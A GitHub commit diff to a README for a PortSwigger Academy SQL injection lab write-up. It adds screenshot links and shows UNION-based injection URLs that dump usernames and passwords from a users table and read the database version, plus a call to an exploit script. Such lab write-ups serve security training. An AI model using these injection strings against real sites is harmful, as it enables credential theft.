Skip to content

Commit 4adcfcd

Browse files
committed
add retrieve database version screen shot
1 parent ce001da commit 4adcfcd

File tree

2 files changed

+5
-2
lines changed

2 files changed

+5
-2
lines changed

port_swigger_academy/sqli/sqli_lab_06/README.md

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -36,11 +36,14 @@ analysis:
3636
![1](screenshot/1.png)
3737

3838
- In this case, we need to retrieve all usernames and passwords from the database. here below the following command to retrive all username & password
39-
`https://ac571f8b1e65b8e6c0b80f5e00f400a1.web-security-academy.net/filter?category=Accessories' UNION select NULL, username || ':' || password FROM users--`
39+
`https://ac571f8b1e65b8e6c0b80f5e00f400a1.web-security-academy.net/filter?category=Accessories' UNION select NULL, username || ':' || password FROM users--`
40+
41+
![2](screenshot/2.png)
42+
4043
- we can retrieve the database version from this lab
4144
`https://ac571f8b1e65b8e6c0b80f5e00f400a1.web-security-academy.net/filter?category=Accessories' UNION select NULL, version()--`
4245

43-
![2](screenshot/2.png)
46+
![3](screenshot/3.png)
4447

4548
```bash
4649
$ python3 sqli_lab_06.py "https://acb91fb01e4afc7dc0d4991700de003a.web-security-academy.net"
Loading

0 commit comments

Comments
 (0)